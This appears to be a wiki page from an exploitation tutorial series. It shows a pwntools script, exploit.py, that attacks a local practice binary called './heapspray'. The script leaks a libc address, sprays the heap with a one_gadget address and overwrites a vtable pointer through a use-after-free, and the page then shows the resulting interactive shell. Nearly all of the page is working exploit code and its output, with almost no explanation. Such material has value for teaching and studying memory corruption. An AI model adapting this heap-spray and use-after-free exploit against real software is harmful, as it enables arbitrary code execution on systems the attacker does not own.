Page History

...

Code Block

language	py
title	exploit.py

from pwn import *

#context.log_level = 'debug'

startBrk =  0x602000
spraySize = 0x10000
sprayRange = 0x5000000
sprayCount = sprayRange /spraySize
targetOffset = 0x400
target = startBrk + sprayRange + targetOffset

p = process('./heapspray')
#sleep(20)
p.recvuntil("Printf() address : ")
libcAddr = p.recvuntil('\n')
libcAddr = int(libcAddr,16)

libcBase = libcAddr - 0x55800
oneGadget = libcBase + 0xf02a4

log.info('target : '+hex(target))
log.info('libcBase Addr : '+hex(libcBase))
log.info('oneGadget Addr : '+hex(oneGadget))

for i in xrange(sprayCount):
    size = spraySize - 0x10
    p.recvuntil("Input size:\n")
    p.send(p32(size))

    p.recvuntil("Input contents:\n")
    buf = p64(oneGadget) * (size // 8)
    buf += 'A' * (size-len(buf))
    p.send(buf)

    p.recvuntil("Will you keep typing?(No:0):\n")
    if i == sprayCount-1:
        print "Finished Heap spray!\n"
        p.sendline(str(0))
    else:
        p.sendline(str(1))

p.recvuntil("Create vtable\n")
p.send("Hello Heap spray & UAF")

p.recvuntil("Input size:\n")
p.send(p32(160))

p.recvuntil("Input contents:\n")
buf = p64(target) * (160 // 8)
buf += 'C' * (160-len(buf))
p.send(buf)

p.interactive()

Code Block

title	Get shell!

lazenca0x0@ubuntu:~/Exploit/11.Heap Spray$ python exploit.py 
[+] Starting local process './heapspray': pid 25405
[*] target : 0x5602400
[*] libcBase Addr : 0x7fc228a49000
[*] oneGadget Addr : 0x7fc228b392a4
Finished Heap spray!

[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

References

...

Page tree

Versions Compared

Old Version 4

New Version Current

Key

References